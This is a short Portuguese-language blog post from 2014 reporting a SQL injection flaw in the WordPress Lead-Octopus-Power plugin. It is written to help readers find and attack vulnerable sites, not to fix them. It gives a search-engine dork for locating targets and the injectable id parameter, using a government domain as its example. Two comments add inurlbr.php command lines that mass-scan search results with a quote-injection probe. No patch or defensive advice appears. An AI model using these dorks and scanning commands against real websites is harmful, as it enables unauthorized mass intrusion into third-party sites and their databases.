terça-feira, 5 de agosto de 2014

Wordpress Lead-Octopus-Power plugin SQL INJECTION


                             0x Wordpress Lead-Octopus-Power plugin SQL INJECTION

Seguindo a serie de como não cria uma cms ops digo de como pequenos bugs em grandes cms são extremamente perigosos e a cada dia acabam se tornando mais comum sendo na própria cms ou em Plugins como ocorre no WordPress ou component que ocorre no Joomla.
Bom vamos la mais uma vez um bug no WordPress explorando SQL INJECTION dessa vez em um plugin vamos ao POC da vulnerabilidade para podemos encontra sites com esse bug usaremos a seguinte 

Dork inurl:wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=  

A falha fica localizada em

site.gov.br/wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=[SQL]

2 comentários:

  1. so pra ajudar a vida da galera criei essa dork by:#ASS4SSINS_W3B nao modifiquem nada se nao nao pega
    php inurlbr.php --dork 'site: inurl:wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=' -s wp.txt -q 1,6 -t 1 --exploit-get "?'0x27"

    ResponderExcluir
    Respostas
    1. desculpa galera a dork acima capita poucos sites pq ela so ta com 1 motor de busca q no caso do google e a parte option_pages esta errado e option pages entaum fis outra dork aki e ficou +- #ASS4SSINS_W3B

      NAO GARATO 100%
      php inurlbr.php --dork 'site:.com inurl:wp-content/plugins/Lead-Octopus-Power/lib/optin/optin page.php?id=' -s wp.txt -q all -t 1 --exploit-get "?'0x27"

      Excluir

............